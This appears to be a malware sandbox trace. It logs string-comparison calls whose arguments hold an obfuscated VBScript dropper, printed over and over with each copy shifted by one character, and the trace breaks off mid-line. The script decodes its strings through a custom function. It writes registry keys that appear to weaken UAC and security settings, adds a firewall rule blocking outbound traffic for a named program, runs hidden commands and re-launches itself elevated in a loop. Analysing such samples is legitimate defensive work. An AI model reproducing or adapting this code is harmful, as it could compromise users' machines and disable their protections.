bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.013] wcsncmp (_String1="newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0223.013] wcsncmp (_String1="ewRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.013] wcsncmp (_String1="wRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0223.013] wcsncmp (_String1="Rule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0223.013] wcsncmp (_String1="ule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, 